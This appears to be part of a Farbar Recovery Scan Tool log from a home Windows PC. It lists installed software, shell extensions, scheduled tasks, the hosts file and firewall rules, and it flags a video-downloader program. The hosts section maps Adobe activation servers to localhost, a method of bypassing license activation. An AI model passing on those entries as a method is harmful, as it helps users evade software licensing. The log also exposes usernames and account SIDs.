Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0 (x86 en-US)) (Version: 55.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 55.0.0.6417 - Mozilla)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
NVIDIA Graphics Driver 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Update 1.11.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.11.3 - NVIDIA Corporation)
Photobook Designer (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Photobook Designer) (Version: Photobook Designer 2015.2.0 - Photobook Worldwide)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6782 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Speed Wi-Fi Next setting tool (HKLM-x32\...\Speed Wi-Fi Next setting tool) (Version: 22.001.26.09.824 - Huawei Technologies Co.,Ltd)
VLC media player 2.0.1 (HKLM-x32\...\VLC media player) (Version: 2.0.1 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR 4.10 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.10.5 - win.rar GmbH)
YTD Video Downloader 5.8.1 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7}) (Version: 5.8.1 - GreenTree Applications SRL) <==== ATTENTION
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2014-10-01] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2013-10-23] (NVIDIA Corporation)
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2011-12-15] ()
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2011-12-15] ()
ContextMenuHandlers1_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1090255531-1958037965-2896169239-1004: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-11] (Dropbox, Inc.)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {05979ED8-D504-4FC3-B767-7A72D6724171} - System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1002 => C:\Users\Gaya\AppData\Local\Citrix\GoToMeeting\2033\g2mupdate.exe [2014-12-01] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {2E3F8A43-FD80-4A2E-B524-A66101B0A12D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [2013-11-13] (Google Inc.)
Task: {32C9F50E-F2D2-4052-9F6D-5C43C065A6DB} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA => C:\Users\Ligaya\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {451D0C7C-D7CF-492A-9D34-2BE6DED90418} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {466133FD-CFCA-4397-84CD-D7B517340EB1} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {589BFC50-0D3F-48DE-9286-0BDA88A52166} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [2013-11-13] (Google Inc.)
Task: {5DACBB75-34B8-42E1-804C-E791CFE2CAA4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-08-09] (Adobe Systems Incorporated)
Task: {5F45B210-325D-4CAB-A7CC-77DC3C9873D2} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {74ECF951-866D-4D9F-9C01-3CFA34413B17} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {76CEF2C8-8C92-4BD7-80C2-4D938BBB1D11} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core => C:\Users\Ligaya\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {89A968BA-E516-45A8-9C98-0AD1F559C151} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.)
Task: {957D11B3-75EB-4E78-BEB5-D7176B223FAA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {ADC8BC3B-B7F6-4082-875E-FA8AE67AA71A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {AE0E7356-B06C-4F92-A374-88A89C8530AE} - System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1004 => C:\Users\Ligaya\AppData\Local\GoToMeeting\7469\g2mupdate.exe
Task: {B0525F06-4717-41D3-A23A-A48832A5409C} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {C41D3040-1B2F-4FDB-B00F-CAA2DE0CAE28} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-01-13] (Microsoft Corporation)
Task: {CAD0D960-7344-47CA-939A-A25A06B600E4} - System32\Tasks\G2MUploadTask-S-1-5-21-1090255531-1958037965-2896169239-1004 => C:\Users\Ligaya\AppData\Local\GoToMeeting\7469\g2mupload.exe
Task: {D2319554-68C3-4096-8599-B7EE339372B3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {DAA30EB7-6E23-4993-9F91-0DAD848DFEE7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {DB13B1F7-805B-4932-BD20-2B3487FD3915} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-02-01] (PC-Doctor, Inc.)
Task: {E700329F-78B1-474B-9D25-42FB79C65A7D} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-02-01] (PC-Doctor, Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core.job => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA.job => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core.job => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA.job => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-01-09 20:17 - 2010-01-09 20:17 - 004254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-21 01:40 - 2010-01-21 01:40 - 008794464 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-09-01 15:40 - 2011-12-15 12:38 - 000193536 _____ () C:\Program Files\WinRAR\rarext.dll
2017-08-18 12:16 - 2017-08-11 15:40 - 002692952 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.101\swiftshader\libglesv2.dll
2017-08-18 12:16 - 2017-08-11 15:40 - 000137048 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.101\swiftshader\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\system32\Drivers\btmhsf.sys:Microsoft_Appcompat_ReinstallUpgrade [0]
AlternateDataStreams: C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg:com.dropbox.attributes [320]
AlternateDataStreams: C:\Users\Ligaya\Desktop\TRAVEL.txt:com.dropbox.attributes [168]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2012-07-26 13:26 - 2017-08-19 08:01 - 000001377 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobe.activate.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1001\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: WSearch => 2
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\StartupApproved\Run: => "Messenger (Yahoo!)"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{2A5E54A3-D77A-406B-AB1D-57AD4066E259}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{D2D32C57-5201-4CDF-970E-72AEE928F8B4}] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{5CD2A3BA-8670-4E2B-AFA3-EF2DA52F3CA0}] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{62409070-7EED-47D8-B14B-B63F6D4CA3F5}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [TCP Query User{35F61B25-E70E-4033-B9C9-429C18D128AE}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{11DE205E-F74E-4C45-86CB-BB15C14DD7A0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{8F574FE5-C560-4974-8B09-EC51F160CA60}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{398D04D3-2A2E-4C68-9614-79287E350821}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E53A05F2-9410-4D63-A6D9-EE45B7253264}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{BCBBFB69-7CC8-480C-AAAA-419F10A1A401}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0DD7777D-4853-4D41-9112-291ED89F639A}] => (Allow) C:\Users\Gaya\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [UDP Query User{F60B45C8-07F5-41BE-912A-F241D767C6F8}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{E3F6AC88-9000-4739-A886-F5CA8EDDB339}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{D39FA79C-150B-48E9-86B9-62CF6E078765}] => (Block) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{85968215-8520-4771-81E8-146D1C4C3496}] => (Block) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{EA30A5C2-3339-4E01-815F-7D6A8EA81AE6}C:\users\gaya\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{F3EC749C-FDBC-44DB-B00C-75C55488A63B}C:\users\gaya\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\gaya\appdata\roaming\utorrent\utorrent.exe
